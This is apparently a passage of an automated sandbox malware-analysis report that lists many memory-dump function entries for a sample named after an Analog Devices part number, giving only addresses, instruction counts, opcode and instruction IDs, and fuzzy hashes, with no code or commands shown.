Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 6de15bf254350d62268f98c1db1ca2eac1d4338bbfd8cc1a8f0a33750ab8cb3f
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: E8E08633111A1487C729DE18D511B72B7A4EF85720F09473EA65387781C534E544C795

Function 01756AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: f6d178ede72500df2b2fbd5e5264a5857509737fa83ea7246d50f8219a124e99
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: 89D05E36511A50AFD3329F1BEA04C13FBF9FBC4E207050A2EB54583A24C670A806CBA0

Function 0173E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 256854034d77f7f447e8df7dbcc6ce996f51a0422f30aed00a8087a426298d9a
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: 4BD0A7321045105BD732AA1CFC04FC373D8BB48730F050459B014C7054C360AC41C644

Function 0177E908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: 94048e0b93da74e8e991617dd2967e0de8b545f4b7465df60e16a3bdcf9cb83c
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: 7FE0EC369507849BDF12DF5DC644F5AFBF9BB94B40F150458A1085B6A4CA24A900CB40

Function 016FA0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: 02213c4e2692f08c3edcfd2b50bd2bf239b60add3a225d367cfcff4392748a3a
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 00D0223221203093DB289A996C04F63B905EF80AA4F0A002C360E93904C1048C43C2E0

Function 0173A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: 44300ac94241e301eb742e01b7cb94308cab649f64ef49fba913b480aee7793d
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: 10D012371D054DBBCB119F66DC01F957BA9E764BA0F444420B514875A0D63AE950D584

Function 0173CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c77e1f8aa1ca04c57b25831c7c794aac52b575c4a8a6655dbded060a702651
Instruction ID: 6c3401eb6fb27d2dbdab912269dfdace2110b19d758ddf77deb6f2b198479195
Opcode Fuzzy Hash: 41c77e1f8aa1ca04c57b25831c7c794aac52b575c4a8a6655dbded060a702651
Instruction Fuzzy Hash: ECD0A930A05002CBDF2BEF08CA18E2EFBB0FB50A40F4004ACE700A2025E32ADD02CB00

Function 017102A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: f1d9f624e9eccd81d59b4ba5380f81ec167dc1ebde7984bd516dc2da78895f2c
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 65D0C935216E80CFD71BCB0CC5A4B55B3A8BB44F44F8144D0F802CBB26D62CD980CA00

Function 0173C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: d5677f1eed71fd4a38bc23dfd53e70e83a5399b2a8535804730f348fa6c4e665
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: D3C01232290648AFC712AE99CD01F02BBA9EBA8B50F000421F2048B6B0D631E820EA84

Function 01720310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 8d335537376763a19074f62af8a8663f3d36513744647193e8168ecec227fc30
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: F4D01236100248EFCB01DF41C890D9AB72AFBD8710F108019FD19076118A31ED63DA90

Function 01700750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 805a0907c37c8a13650b51a1cfbad4d0d16fb2ea3bbf77f7542ad6d795f24eec
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: F1C04879B01A428FCF16DB2ED298F49B7E4FB44750F150890E885CBB26EA64E941CA10

Function 01744340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f7ae473f60c81cd247e8552401d6b3681ea7b5c61c5fb67f11f9816c7f663fd
Instruction ID: 9cead5fe6bd7fc936c7e768d0db3be0e3daa60532e23cd124813e3b2ef67b313
Opcode Fuzzy Hash: 7f7ae473f60c81cd247e8552401d6b3681ea7b5c61c5fb67f11f9816c7f663fd
Instruction Fuzzy Hash: 9A900231609800139380715948845468005A7E0301B55C021F4424564CCA648B565762

Function 01744650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074717604b7bfd431eba5621f0deb1bee8e844431ee4357caee5130592d78f57
Instruction ID: 54d23eb56e5ff0e6d2f58b7ac91b4adeadf4453def82454a9d70fec5615adafe
Opcode Fuzzy Hash: 074717604b7bfd431eba5621f0deb1bee8e844431ee4357caee5130592d78f57
Instruction Fuzzy Hash: E790026160550043438071594804406A005A7E1301395C125B4554570CC6688A55976A

Function 01742BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6716521a5d52d2981750959bacff41889e3446235d8f007ebf640beae847969
Instruction ID: a22484a7e872a24d3e4b2c2702b006521a96cd3454b8f7ca3debbd6d6c4d56eb
Opcode Fuzzy Hash: c6716521a5d52d2981750959bacff41889e3446235d8f007ebf640beae847969
Instruction Fuzzy Hash: 7490023120540803D3C07159440464A400597D1301F95C025B4025664DCA658B597BA2

Function 01742BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88cff82712d9e3580d398209eedf883cb5cbe687a336222ae2a604425c6357b1
Instruction ID: 1d01d54560db1581a57b247b7e420a136f68d06ee057f3019e52e7c48329efa3
Opcode Fuzzy Hash: 88cff82712d9e3580d398209eedf883cb5cbe687a336222ae2a604425c6357b1
Instruction Fuzzy Hash: DB90023120944843D38071594404A46401597D0305F55C021B40646A4DD6758F55BB62

Function 01742BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 722a10cec8ec09f7bcaa4c45ebe169580d97b34fe627027ddcfac2b39426337e
Instruction ID: b0976bb76264072413cd2a1703d8193ee540345ea0092f169656a5d23bb2b5cc
Opcode Fuzzy Hash: 722a10cec8ec09f7bcaa4c45ebe169580d97b34fe627027ddcfac2b39426337e
Instruction Fuzzy Hash: 1690023160940803D39071594414746400597D0301F55C021B4024664DC7A58B557BA2

Function 01742B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57e0cc8ae8d893f2650ba9a54cee87d8c0c531cdf9b036bf2b7a9fc3eebbc42a
Instruction ID: 36456be8d95ebca1d72ec4f73e5e18e5042fe1d4493fc5bbd120506acb6d7c05
Opcode Fuzzy Hash: 57e0cc8ae8d893f2650ba9a54cee87d8c0c531cdf9b036bf2b7a9fc3eebbc42a
Instruction Fuzzy Hash: 9290023120540803D34471594804686400597D0301F55C021BA024665ED6B58A917632

Function 01742AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef026b62be4f6636cc9125397f82b97670be2704874d309da5925956d1bf3253
Instruction ID: b642f597ec01e504d58edbd866321bc7744d5bb838a6f9e507aa42ddb51a342e
Opcode Fuzzy Hash: ef026b62be4f6636cc9125397f82b97670be2704874d309da5925956d1bf3253
Instruction Fuzzy Hash: F6900225225400030385B559060450B4445A7D6351395C025F54165A0CC6718A655722

Function 01742AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d293462cdfa19e218e5a8ac75bc31da1c556b8b4701a70c2b561ba451c7772c
Instruction ID: 41f545b83b9c9d7b724993038021517d4e7f63ffdf392a49ffddad84699acbaa
Opcode Fuzzy Hash: 6d293462cdfa19e218e5a8ac75bc31da1c556b8b4701a70c2b561ba451c7772c
Instruction Fuzzy Hash: 89900435315400030345F55D07045074047D7D5351355C031F5015570CD771CF715733

Function 01742AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38178956b7d2db2e25d689a63941b97a1a371b1eac37484d4de3e8a480cdf26b
Instruction ID: 5b73c8fe7a240e2d45be0a15140b676c511be460f3ef1e3425e8e5cf9a01935a
Opcode Fuzzy Hash: 38178956b7d2db2e25d689a63941b97a1a371b1eac37484d4de3e8a480cdf26b
Instruction Fuzzy Hash: DD9002A1205540934740B2598404B0A850597E0201B55C026F5054570CC5758A519636

Function 01742D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19426fe86f3db1a9e5106b904ffe6c656bfe0b793246519f2bce19d8913f128
Instruction ID: 2d8e60db51d69b0bf777af9912f59a7b2b7e1e18bf6ca9cc0bb2e2c9879af7dd
Opcode Fuzzy Hash: d19426fe86f3db1a9e5106b904ffe6c656bfe0b793246519f2bce19d8913f128
Instruction Fuzzy Hash: 9190022130540003D380715954186068005E7E1301F55D021F4414564CD9658A565723

Function 01742D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6855fe13e84e173e4d4957a8252dd4cd7fae4d57a0612667173798a0fa48f17b
Instruction ID: 9efbf6402f16b3f431f5536df27f5e0916409d4943aaa255b2ee225e1eed087c
Opcode Fuzzy Hash: 6855fe13e84e173e4d4957a8252dd4cd7fae4d57a0612667173798a0fa48f17b
Instruction Fuzzy Hash: 8F90022921740003D3C07159540860A400597D1202F95D425B4015568CC9658A695722

Function 01742D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab64b82ebfb0bc62fa774353b5fd1bd2662b2b27d8d2e65ed026a6521882338d
Instruction ID: df9e281ce702b67e685ec2ef6ed2cec4bbe0ee0cbd9f38db3c2ddd6348a642f0
Opcode Fuzzy Hash: ab64b82ebfb0bc62fa774353b5fd1bd2662b2b27d8d2e65ed026a6521882338d
Instruction Fuzzy Hash: 0E90022120944443D34075595408A06400597D0205F55D021B50645A5DC6758A51A632

Function 01742DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67e11e1bb1cd0389ee62df81dc3441cbacf9796341c2efbfe4d66e2db92c91de
Instruction ID: 0365183d396c7f0bc696570e9b37cdfefa238d02d3ae539ada6174bf3800ff69
Opcode Fuzzy Hash: 67e11e1bb1cd0389ee62df81dc3441cbacf9796341c2efbfe4d66e2db92c91de
Instruction Fuzzy Hash: 50900221246441535785B15944045078006A7E0241795C022B5414960CC5769A56DB22

Function 01742DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f719cb160b7af3ae6b3df762d7526da5775f3f5e8cea8948cf6489c930ede3e5
Instruction ID: 566f216b03de87e903a3dfa15c8a33d44eb4460fe75523b3ff8a034c4312e971
Opcode Fuzzy Hash: f719cb160b7af3ae6b3df762d7526da5775f3f5e8cea8948cf6489c930ede3e5
Instruction Fuzzy Hash: FB90023124540403D381715944046064009A7D0241F95C022B4424564EC6A58B56AF62

Function 01742C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512f8e2781ea493f07fe5620cc37a99f3f2c7c28f4fb3e231302721e8cdc472b
Instruction ID: 59353800194e113a284f259e5acd8fc7780be5f8e26e282a3b5fc0481d3bbc64
Opcode Fuzzy Hash: 512f8e2781ea493f07fe5620cc37a99f3f2c7c28f4fb3e231302721e8cdc472b
Instruction Fuzzy Hash: 6490023120540843D34071594404B46400597E0301F55C026B4124664DC665CA517A22

Function 01742CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43bc3a8133051907d7b5283f1dd460d6e43226340f084aa67597a48a9f72b184
Instruction ID: 9905c4433bd42113b079fee88582527a52a0c3cfa849cc95deb74ec145dba22e
Opcode Fuzzy Hash: 43bc3a8133051907d7b5283f1dd460d6e43226340f084aa67597a48a9f72b184
Instruction Fuzzy Hash: 2990023120540403D34071595508707400597D0201F55D421B4424568DD6A68A516622

Function 01742CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe88fdf0958d5eefab202ce3e61571163b439d8aed3cdacbdf10d00b9c6e26ff
Instruction ID: 1a8e12329ef04339acf0b0b32844e8ef961a1f64dcc1339fe5b9eb29ea7dfa5d
Opcode Fuzzy Hash: fe88fdf0958d5eefab202ce3e61571163b439d8aed3cdacbdf10d00b9c6e26ff
Instruction Fuzzy Hash: B290022160940403D38071595418706401597D0201F55D021B4024564DC6A98B556BA2

Function 01742CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfad4803dfd334016203d2be0067c6b14be3561ca4d2a3166aa4f89104346580
Instruction ID: d089b35edce1718a02741f865d7cc7fbbe4e8a6f9ef8dd17d031b49e629d242c
Opcode Fuzzy Hash: dfad4803dfd334016203d2be0067c6b14be3561ca4d2a3166aa4f89104346580
Instruction Fuzzy Hash: A690023120540403D34075995408646400597E0301F55D021B9024565EC6B58A916632

Function 01742F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7d2c4d7f7472c721326450a95b36d0fb4583cb3265742b59a8f5e162141b0d
Instruction ID: 801fba306861d52d9a1ffd6df7ce59b12a2d786c8c5dc1e5d48263fab6ff45e3
Opcode Fuzzy Hash: 9d7d2c4d7f7472c721326450a95b36d0fb4583cb3265742b59a8f5e162141b0d
Instruction Fuzzy Hash: 9390026121540043D34471594404706404597E1201F55C022B6154564CC5798E615626

Function 01742F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f419346d4ebfa8f77589fc0ab79c20394fcf4f8dcd09c31fcaa928a51d418f2
Instruction ID: 0e87141786ad33a06bb575cf773f146f42585b9fe10d1f375911aa7252f04fb1
Opcode Fuzzy Hash: 5f419346d4ebfa8f77589fc0ab79c20394fcf4f8dcd09c31fcaa928a51d418f2
Instruction Fuzzy Hash: 4D90026134540443D34071594414B064005D7E1301F55C025F5064564DC669CE526627

Function 01742FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749eb7349e2e1e7cfec1aaf816a918c6b84535539ac05ea294fda8ee14285326
Instruction ID: bec33966a6e16eb2ee0c0dd34bddec8878d68818ff9a4d74da22d68bbadd05ae
Opcode Fuzzy Hash: 749eb7349e2e1e7cfec1aaf816a918c6b84535539ac05ea294fda8ee14285326
Instruction Fuzzy Hash: B1900221215C0043D34075694C14B07400597D0303F55C125B4154564CC9658A615A22

Function 01742FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56be7e5920a3d2c3f812fdf3f2030bb9c2abb608c784b3065001c8a9f05238ae
Instruction ID: 83b9cbc40241e3273e559932ef65728cfcab50426b98f8942657624bc613ea07
Opcode Fuzzy Hash: 56be7e5920a3d2c3f812fdf3f2030bb9c2abb608c784b3065001c8a9f05238ae
Instruction Fuzzy Hash: 6C900221605400434380716988449068005BBE1211755C131B4998560DC5A98A655B66

Function 01742FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0116bcaff66f345e7189197605bd62892d53d3383e798495d7dfcf44c8500bf9
Instruction ID: 4895074f54867c1299381a70913eb0dd26e0fba236f4b9db4c122f9d4886ab48
Opcode Fuzzy Hash: 0116bcaff66f345e7189197605bd62892d53d3383e798495d7dfcf44c8500bf9
Instruction Fuzzy Hash: 8990023120580403D34071594808747400597D0302F55C021B9164565EC6B5CA916A32

Function 01742F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f49e2efcd6434bc14cc592c6f10a3cf03e0ce1f1b47bb78df97726fe67756f7d
Instruction ID: 5b4abe08ab875a5f8a05400da9b92f5498e99a493686bac73c1da1d4f85b77dc
Opcode Fuzzy Hash: f49e2efcd6434bc14cc592c6f10a3cf03e0ce1f1b47bb78df97726fe67756f7d
Instruction Fuzzy Hash: DF90023120580403D3407159481470B400597D0302F55C021B5164565DC6758A516A72

Function 01742E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00225b690d9738ed9c8a45330fbf7c26e11e102e8604f9b5380223ace3c336e4
Instruction ID: d39401f873f55f06f090da5160908848aae2a07448bf70ab6e44ad9cff5d48e4
Opcode Fuzzy Hash: 00225b690d9738ed9c8a45330fbf7c26e11e102e8604f9b5380223ace3c336e4
Instruction Fuzzy Hash: 8D90022130540403D342715944146064009D7D1345F95C022F5424565DC6758B53A633

Function 01742EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

